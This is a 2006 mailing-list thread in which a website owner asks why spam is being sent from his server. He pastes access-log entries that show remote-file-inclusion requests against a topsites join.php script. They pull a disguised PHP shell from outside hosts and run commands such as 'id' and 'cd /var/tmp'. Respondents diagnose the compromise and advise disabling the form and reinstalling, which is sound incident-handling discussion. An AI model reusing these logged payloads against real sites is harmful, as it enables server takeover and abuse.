-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth <paul(a)city-fan.org> wrote:
On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul(a)city-fan.org> wrote:
>
> > On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA1
> > >
> > > On Tue, 23 May 2006 00:14:32 +0000
> > > replies-lists-redhat(a)listmail.innovate.net wrote:
> > > > i haven't been following this topic in great detail, but i
suspect
> > > > that you have a form on your site that is being exploited for
"form
> > > > spam". if you're not familiar with this, search google for
"form
> > > > spam".
> > > >
> > > > - Rick
> > >
> > >
> > > Rick,
> > > Thank you, No, I have not heard of this.
> >
> > I don't think that's what this is. Form spam takes advantage of
> > poorly-coded mail/contact forms and uses them to send mail to recipients
> > other than those intended by the form designer.
> >
> > What's happening here is that the spammer is running their own code
> > (downloaded into /tmp) to send the mail, a rather more serious
> > situation.
> >
> > Paul.
> >
> I might not know too much but I really think they are using my forms. I
> found quite a few log entries. Here are a few.
> 81.199.173.8 - - [22/May/2006:18:57:51 -0400]
> "POST
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
> HTTP/1.0" 200 5923
>
> AOL:
> 172.179.33.217 - - [21/May/2006:07:58:01 -0400]
> "GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
> HTTP/1.1" 200 2374
> 172.179.33.217 - - [21/May/2006:07:58:20 -0400]
> "GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
> HTTP/1.1" 200 2412
> 172.179.33.217 - - [21/May/2006:07:58:34 -0400]
> "GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
> HTTP/1.1" 200 2323
>
> And the
xpl.netmisphere2.com site has hacking information:
>
http://xpl.netmisphere2.com/ I think this outta be illegal!!
Looks like an exploit of a cross-site scripting vulnerability in your
join.php form.
http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
script that gets injected into your form, it's not an image at all.
You need to turn off that form until you can get a fixed version of that
application. And of course reinstall that system.
Paul.
Thanks Paul, That is what I thought. I am writing my own topsites anyway, so
that is no big deal. I will be deleting the other one.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEczXHfw3TK8jhZrsRAnILAKCH0SHKRpaagUi3Fe4oJSiUWDvC5wCaAuCQ
5sR75hAfYXAmF2Cjh5suKfo=
=4buC
-----END PGP SIGNATURE-----